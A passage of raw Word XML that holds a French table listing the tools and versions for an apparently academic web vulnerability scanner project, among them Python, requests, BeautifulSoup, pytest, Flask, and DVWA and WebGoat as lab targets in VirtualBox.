            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EFA3DC5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7120A061" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="4C0EBA91" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52B0CBB1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Langage principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63832642" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="395F8D77" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3.10+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C2DFC1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Développement de l'outil complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="4E0E4AB2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6C182324" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Requêtes HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="75090D71" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7755A182" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2.31+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2B21E300" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Envoi/réception des requêtes web, gestion sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7C5B41B7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15546463" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Parsing HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="619BD5A5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BeautifulSoup4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3260172C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4.12+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B65D2F8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Extraction liens, formulaires, paramètres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1CC6158A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="53F51093" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Regex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7B89C46B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>re (stdlib)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6F414816" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="367760B7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Matching signatures de vulnérabilités</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="777C65A2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7635066D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B4485BF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>argparse (stdlib)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ECBDDDB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E0B02EF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Interface ligne de commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="09C23559" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7A53FDBF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="033A7902" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>pytest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7540F580" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.4+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="58171D0C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tests unitaires et d'intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="277CF371" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A853E97" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>App de test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64BF2DF3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1552B04D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3.0+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20423877" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Application web vulnérable pour les tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="7326A912" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7F93F117" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="699504A7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTML5/CSS3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="14E059E8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7DE5C795" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Génération du rapport final autonome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="03C1041C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D3100D1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Target 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF90D58" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C81C462" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.10+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0957AE29" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application vulnérable (PHP/MySQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="427C38C6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1EC755E7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Target 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="60374D71" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WebGoat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="44A2CFAD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8.2+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="350601B4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application vulnérable (Java/Spring)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1E697AB4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="329ACA5D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Virtualisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="775221BB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24E4FBDF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F9F5414" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Environnement de test isolé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="4BABE5C8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4F95138C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OS cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="251BB8A1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
